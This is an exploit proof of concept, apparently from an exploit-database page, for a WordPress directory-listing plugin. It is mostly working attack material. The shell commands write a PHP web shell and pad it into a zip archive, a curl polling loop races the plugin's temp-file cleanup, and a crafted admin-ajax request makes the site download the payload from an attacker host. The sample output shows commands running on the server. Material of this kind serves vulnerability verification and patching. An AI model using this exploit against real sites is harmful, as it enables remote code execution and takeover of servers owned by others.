## https://sploitus.com/exploit?id=WPEX-ID:03A04EAB-BE47-4195-AF77-0DF2A32EB807
1. Craft a zip file containing the web shell plus thousands of filler files (the filler pads the archive so unpacking takes long enough for the loop in step 2 to reach the shell while it is still on disk)
-------bash
# Single quotes: inside double quotes the shell would expand $_REQUEST to nothing
echo '<?php echo shell_exec($_REQUEST["c"]); ?>' > dummy_shell.php

# 10000 filler files with random contents
for i in $(seq 1 10000); do
    echo $RANDOM | md5sum | head -c 30 > "dummy_$i.txt"
done

zip -qqr "payload.zip" dummy_*
-------bash

2. Create a shell script that polls the shell in a loop until it answers 200
-------bash
#!/bin/sh

# Poll until the extracted shell exists under the plugin temp dir, then run `id` through it
while true; do
    code=$(curl -s -w "%{http_code}" -o result "http://<wp_site>/wp-content/plugins/atbdp-temp-dir/dummy_shell.php?c=id")
    if [ "$code" -eq 200 ]; then
        echo ""
        echo "RCE success"
        cat result
        break
    fi
    echo -n "."
done
-------bash

3. Run the script from step 2 and leave it polling

4. Log in as a WP admin and send this crafted HTTP request (fill in the Cookie header and the nonce field first; Content-Length must then match the final body)
-------httprequest
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 750
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary221I9lesLluZJPEm
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fsrv%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2022%2F05%2Flistings-export-data.txt&delimiter=%2C
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [Replace with Admin+ cookie]
Connection: close

------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="action"

atbdp_download_file
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[download_link]"

https://<attacker_site>/payload.zip
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[skip_licencing]"

true
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[permalink]"

true
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="nonce"

<as admin, load http://<wp_domain>/wp-admin/edit.php?post_type=at_biz_dir, search the page source for 'atbdp_admin_data = {"nonce":' and copy the value that follows it>
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="type"

plugin
------WebKitFormBoundary221I9lesLluZJPEm--

-------httprequest

5. The script from step 2 prints the result of the "id" command as run on the targeted WP site. Example:
..................................................................
RCE success
uid=33(www-data) gid=33(www-data) groups=33(www-data)